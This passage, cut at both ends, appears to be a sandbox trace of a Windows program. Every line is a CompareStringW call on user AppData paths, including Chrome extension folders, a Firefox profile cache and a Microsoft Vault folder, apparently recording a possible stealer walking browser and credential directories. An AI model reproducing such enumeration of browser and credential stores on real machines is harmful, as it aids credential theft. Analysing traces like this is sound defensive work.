Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\", cchCount2=134) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\", cchCount2=134) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount1=122, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\", cchCount2=134) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount2=73) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount2=73) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount2=73) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount2=73) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount2=73) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\", cchCount2=134) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\", cchCount2=134) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\", cchCount2=134) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\", cchCount2=134) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount2=85) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount2=85) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount2=85) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount2=85) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount2=85) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount2=85) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchCount2=75) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchCount2=75) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchCount2=75) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchCount2=75) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchCount2=75) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\", cchCount2=73) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\", cchCount2=73) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\", cchCount2=73) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\", cchCount2=73) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\", cchCount2=73) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount2=76) returned 1 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount2=76) returned 3 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount1=85, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\", cchCount2=81) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\", cchCount2=81) returned 3 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\", cchCount2=81) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\", cchCount2=81) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\", cchCount2=81) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount1=85, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\", cchCount2=81) returned 3 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount1=55, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\", cchCount2=73) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\", cchCount2=73) returned 3 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\", cchCount2=73) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount1=76, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\", cchCount2=73) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\", cchCount1=81, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\", cchCount2=73) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\", cchCount1=85, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\", cchCount2=73) returned 3 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount1=55, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\", cchCount2=76) returned 1 [0296.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\", cchCount1=76, 